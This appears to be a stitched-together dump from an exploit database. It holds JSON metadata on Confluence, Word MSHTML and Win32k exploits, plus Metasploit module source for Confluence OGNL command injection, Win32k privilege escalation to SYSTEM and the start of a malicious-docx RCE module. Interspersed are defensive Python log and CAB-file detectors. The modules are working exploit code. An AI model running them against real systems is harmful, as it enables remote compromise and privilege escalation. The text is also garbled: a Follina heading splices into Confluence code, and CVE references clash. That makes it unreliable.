{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T20:18:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-23T17:24:50", "id": "66468422-89C0-5AC8-9CEA-6B512338FF7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-30T07:31:59", "description": "# CVE-2022-30190 (Follina)\n\n[\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => 
[REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { 
header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:28:01", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. 
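The module above keeps the command out of the request path and puts the whole OGNL expression in it, which decides where a defender can look. As an added example (not part of the 0day.today entry or of the Metasploit module), the Python below scans access-log lines for that path-borne expression, undoing the URL encoding the module applies (and bounded double encoding), and reports the client, path and OGNL markers it finds. The log lines are constructed for the example in combined log format; the marker list is an assumption about what such a payload contains, drawn from the module's `ognl_payload`, and `module_style_path` uses urllib's encoder as a stand-in for `Rex::Text.uri_encode`.

```python
"""Log-side detection for the Confluence OGNL injection primitive.

Added example, not part of the 0day.today entry or the Metasploit module.
The module URL-encodes an OGNL expression and sends it as a path segment
right before /dashboard.action; the OS command travels in a randomly named
X- request header and only a marker comes back in a response header.  An
access log therefore records the OGNL expression in the request path but
not the command, so the path is what detection has to key on.  The log
lines in SAMPLE_LOG are constructed for this example (combined log format).
"""
import re
from typing import Dict, List
from urllib.parse import quote, unquote

# Substrings that indicate OGNL evaluation and the reflection/scripting chain
# the module's payload builds (assumed marker list; extend here, not in the parser).
OGNL_MARKERS = (
    "${",                   # OGNL expression delimiter used by the module
    "%{",                   # alternate OGNL delimiter
    "Class.forName(",
    "ServletActionContext",
    "ScriptEngineManager",
    "getRuntime().exec",
)

# Combined log format: client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def module_style_path(expression: str, base: str = "/") -> str:
    """Shape of the request path the module sends: the URL-encoded OGNL
    expression as one path segment followed by dashboard.action."""
    return base.rstrip("/") + "/" + quote(expression, safe="") + "/dashboard.action"


def decode_path(path: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double encoding, the obvious way to
    slip past a single-decode filter, is undone before matching."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def inspect_request_path(path: str) -> List[str]:
    """Return the OGNL markers found in a request path (empty list = clean).

    The query string is dropped first: the injection lives in the path, and
    ordinary parameters would otherwise add noise."""
    decoded = decode_path(path.split("?", 1)[0])
    return [marker for marker in OGNL_MARKERS if marker in decoded]


def scan_access_log(lines) -> List[Dict]:
    """Parse combined-format lines and report every request whose path
    carries OGNL markers, with the client, raw path and status."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        markers = inspect_request_path(m["path"])
        if markers:
            hits.append({"client": m["client"], "path": m["path"],
                         "status": int(m["status"]), "markers": markers})
    return hits


# Constructed sample: one benign login, one module-style injection, one
# double-encoded variant, one benign dashboard request.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2022:10:44:38 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jun/2022:10:45:02 +0000] "POST /%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29%7D/dashboard.action HTTP/1.1" 302 0 "-" "python-requests/2.27"',
    '10.0.0.9 - - [04/Jun/2022:10:45:40 +0000] "POST /%2524%257BClass.forName%2528%2522javax.script.ScriptEngineManager%2522%2529%257D/dashboard.action HTTP/1.1" 302 0 "-" "python-requests/2.27"',
    '10.0.0.5 - - [04/Jun/2022:10:46:11 +0000] "GET /dashboard.action HTTP/1.1" 200 8811 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["markers"])
```

A hit tells you an expression reached the server, not what ran: because the command sits in a request header and only a marker returns, recovering the command needs a full request capture, not the access log alone.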
## 0day.today exploit 37433: Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit

Local privilege escalation module that combines the CVE-2022-21882 patch bypass with the original CVE-2021-1732 exploit so it runs on Windows 10 1803 through 21H2 (builds 17134 to 19044, per its `check`). The module's own description, kept in the source below, explains the WndExtra offset confusion both bugs share. The kernel exploit proper lives in a prebuilt DLL (`data/exploits/CVE-2022-21882/CVE-2022-21882.x64.dll`) that the module injects reflectively with the payload prepended by its length; only the Ruby wrapper is recorded here.

| Published | Type | CVEs | CVSS v3.0 | CVSS v2 | Entry id | Source |
|---|---|---|---|---|---|---|
| 2022-02-28 | zdt (exploit) | CVE-2016-7255, CVE-2021-1732, CVE-2022-21882 | 7.8 HIGH (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 7.2 HIGH (AV:L/AC:L/Au:N/C:C/I:C/A:C) | [1337DAY-ID-37433](<https://0day.today/exploit/description/37433>) | <https://0day.today/exploit/37433> |

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  include Msf::Exploit::Deprecated
  moved_from 'exploit/windows/local/cve_2021_1732_win32k'

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Win32k ConsoleControl Offset Confusion',
          'Description' => %q{
            A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
            NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
            treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
            achieve an out of bounds write operation, eventually leading to privilege escalation.

            This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
            In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause
            is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
            function on a wider range of Windows 10 targets.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            # CVE-2021-1732
            'BITTER APT', # exploit as used in the wild
            'JinQuan', # detailed analysis
            'MaDongZe', # detailed analysis
            'TuXiaoYi', # detailed analysis
            'LiHao', # detailed analysis
            # CVE-2022-21882
            'L4ys', # github poc
            # both CVEs
            'KaLendsi', # github pocs
            # Metasploit exploit
            'Spencer McIntyre' # metasploit module
          ],
          'Arch' => [ ARCH_X64 ],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
          ],
          'Payload' => {
            'DisableNops' => true
          },
          'References' => [
            # CVE-2021-1732 references
            [ 'CVE', '2021-1732' ],
            [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
            [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
            [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
            # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
            [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
            [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
            [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
            [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
            # CVE-2022-21882 references
            [ 'CVE', '2022-21882' ],
            [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
            [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
          ],
          'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
          'DefaultTarget' => 0,
          'Notes' => {
            'Stability' => [ CRASH_OS_RESTARTS, ],
            'Reliability' => [ REPEATABLE_SESSION, ],
            'SideEffects' => []
          }
        }
      )
    )
  end

  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return Exploit::CheckCode::Safe
    end

    # The whole match ([0]) resolves to the build number inside the sysinfo OS string.
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Windows Build Number = #{build_num}")

    unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
      print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    # The exploit DLL receives the payload as a little-endian length prefix followed by the bytes.
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload
    )

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end
```

## 0day.today exploit 37126: Microsoft Office Word MSHTML Remote Code Execution Exploit

This Metasploit module creates a malicious docx file that, when opened in Word on a vulnerable Windows system, will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.

| Published | Type | CVE | CVSS v3.1 | CVSS v2 | Entry id |
|---|---|---|---|---|---|
| 2021-12-09 | zdt (exploit) | CVE-2021-40444 | 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, user interaction required) | 6.8 MEDIUM (AV:N/AC:M/Au:N/C:P/I:P/A:P) | [1337DAY-ID-37126](<https://0day.today/exploit/description/37126>) |
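The module whose source follows delivers its DLL inside a CAB it builds by hand (`create_cab`): the CFFILE name carries a `../` prefix, and the CFFILE `cbFile` is inflated by 1 GiB beyond the data shipped in the CFDATA blocks, which the module's comment marks as the trigger. As an added example, not part of the 0day.today entry or of the Metasploit module, the Python below parses such a container and raises those two properties as findings, alongside CFDATA checksum verification per the MS-CAB specification the module cites. The sample payload bytes and file names are constructed; `build_cab` mirrors the module's single-folder, uncompressed layout only so the parser has realistic input.

```python
"""Parser for the hand-built CAB container described above (added example;
not part of the 0day.today entry or the Metasploit module).  Layout and
checksum follow the MS-CAB specification the module cites; every input
byte below is constructed for the example."""
import struct

CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # signature .. iCabinet, 36 bytes
CFFOLDER = struct.Struct("<IHH")             # coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")            # cbFile, uoffFolderStart, iFolder, date, time, attribs
CFDATA = struct.Struct("<IHH")               # csum, cbData, cbUncomp


def cab_checksum(data: bytes, seed: int = 0) -> int:
    """MS-CAB CSUMCompute: XOR of little-endian dwords; a 1-3 byte tail is
    folded in as a big-endian partial word."""
    csum = seed
    full = len(data) & ~3
    for off in range(0, full, 4):
        csum ^= struct.unpack_from("<I", data, off)[0]
    tail = 0
    for b in data[full:]:
        tail = (tail << 8) | b
    return csum ^ tail


def cfdata_checksum(block: bytes, cb_data: int, cb_uncomp: int) -> int:
    """Value stored in CFDATA.csum: block checksum seeded with the checksum
    of the cbData/cbUncomp header bytes."""
    return cab_checksum(block, cab_checksum(struct.pack("<HH", cb_data, cb_uncomp)))


def build_cab(payload: bytes, name: str, declared_size=None, block_size=32768) -> bytes:
    """Uncompressed one-folder, one-file CAB in the module's layout.
    declared_size lets the caller lie in CFFILE.cbFile the way the exploit does."""
    name_z = name.encode("latin-1") + b"\x00"
    blocks = [payload[i:i + block_size] for i in range(0, len(payload), block_size)] or [b""]
    cfdata = b"".join(CFDATA.pack(cfdata_checksum(b, len(b), len(b)), len(b), len(b)) + b
                      for b in blocks)
    off_files = CFHEADER.size + CFFOLDER.size        # 0x2C, as in the module
    off_data = off_files + CFFILE.size + len(name_z)
    cb_file = len(payload) if declared_size is None else declared_size
    header = CFHEADER.pack(b"MSCF", 0, off_data + len(cfdata), 0, off_files, 0,
                           3, 1, 1, 1, 0, 0x04D2, 0)  # version 1.3, one folder, one file
    folder = CFFOLDER.pack(off_data, len(blocks), 0)  # typeCompress 0 = none
    cffile = CFFILE.pack(cb_file, 0, 0, 0x535A, 0x5CC3, 0x20) + name_z  # fixed date/time
    return header + folder + cffile + cfdata


def parse_cab(data: bytes) -> dict:
    """Walk CFHEADER, CFFOLDER, CFFILE and the CFDATA chains; return the
    structures plus the findings a defender would want raised."""
    findings = []
    (sig, _, cb_cabinet, _, off_files, _, v_min, v_maj,
     n_folders, n_files, flags, _, _) = CFHEADER.unpack_from(data, 0)
    if sig != b"MSCF":
        raise ValueError("not a CAB: bad signature")
    if (v_maj, v_min) != (1, 3):
        findings.append(f"unexpected format version {v_maj}.{v_min}")
    if cb_cabinet != len(data):
        findings.append(f"cbCabinet {cb_cabinet} != actual size {len(data)}")
    if flags:  # reserve areas and prev/next cabinets change the layout
        findings.append(f"header flags 0x{flags:x} not handled by this parser")
        return {"folders": [], "files": [], "findings": findings}

    folders = [CFFOLDER.unpack_from(data, CFHEADER.size + i * CFFOLDER.size)
               for i in range(n_folders)]
    files, pos = [], off_files
    for _ in range(n_files):
        cb_file, uoff, ifolder, _, _, _ = CFFILE.unpack_from(data, pos)
        end = data.index(b"\x00", pos + CFFILE.size)
        name = data[pos + CFFILE.size:end].decode("latin-1")
        files.append({"name": name, "cbFile": cb_file, "iFolder": ifolder, "uoffFolderStart": uoff})
        pos = end + 1
        if "../" in name or "..\\" in name or name[:1] in ("/", "\\") or name[1:2] == ":":
            findings.append(f"path traversal in CFFILE name: {name!r}")

    carried = []  # bytes of uncompressed data each folder really holds
    for fi, (off, n_blocks, typ) in enumerate(folders):
        pos, total = off, 0
        for _ in range(n_blocks):
            csum, cb_data, cb_uncomp = CFDATA.unpack_from(data, pos)
            block = data[pos + CFDATA.size:pos + CFDATA.size + cb_data]
            if len(block) != cb_data:
                findings.append(f"folder {fi}: CFDATA at offset {pos} is truncated")
                break
            if csum and csum != cfdata_checksum(block, cb_data, cb_uncomp):
                findings.append(f"folder {fi}: CFDATA checksum mismatch at offset {pos}")
            if typ == 0 and cb_data != cb_uncomp:
                findings.append(f"folder {fi}: stored uncompressed but cbData != cbUncomp")
            total += cb_uncomp
            pos += CFDATA.size + cb_data
        carried.append(total)

    # The exploit's trick: CFFILE.cbFile promises far more than the CFDATA holds.
    for f in files:
        have = carried[f["iFolder"]] if f["iFolder"] < len(carried) else 0
        if f["uoffFolderStart"] + f["cbFile"] > have:
            findings.append(f"{f['name']!r}: cbFile {f['cbFile']} exceeds the {have} bytes "
                            f"of CFDATA in folder {f['iFolder']}")
    return {"folders": folders, "files": files, "findings": findings}


# Constructed inputs: a well-formed CAB and one shaped like the module's output
# (a "../" name and cbFile inflated by 1 GiB beyond the data actually shipped).
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256)) * 3
BENIGN_CAB = build_cab(SAMPLE_PAYLOAD, "payload.inf")
SUSPECT_CAB = build_cab(SAMPLE_PAYLOAD, "../payload.inf",
                        declared_size=len(SAMPLE_PAYLOAD) + 1073741824)

if __name__ == "__main__":
    for label, cab in (("benign", BENIGN_CAB), ("suspect", SUSPECT_CAB)):
        print(label, parse_cab(cab)["findings"])
```

The checksum routine accepts the module's own CFDATA checksums: its byte-wise XOR, reverse and tail-padding sequence produces the same value as the specification's dword XOR, so a mismatch on a captured sample points to corruption or a different generator rather than to this exploit family.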
Module source as recorded in the entry:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Office Word Malicious MSHTML RCE',
        'Description' => %q{
          This module creates a malicious docx file that when opened in Word on a vulnerable Windows
          system will lead to code execution. This vulnerability exists because an attacker can
          craft a malicious ActiveX control to be used by a Microsoft Office document that hosts
          the browser rendering engine.
        },
        'References' => [
          ['CVE', '2021-40444'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],
          ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],
          ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],
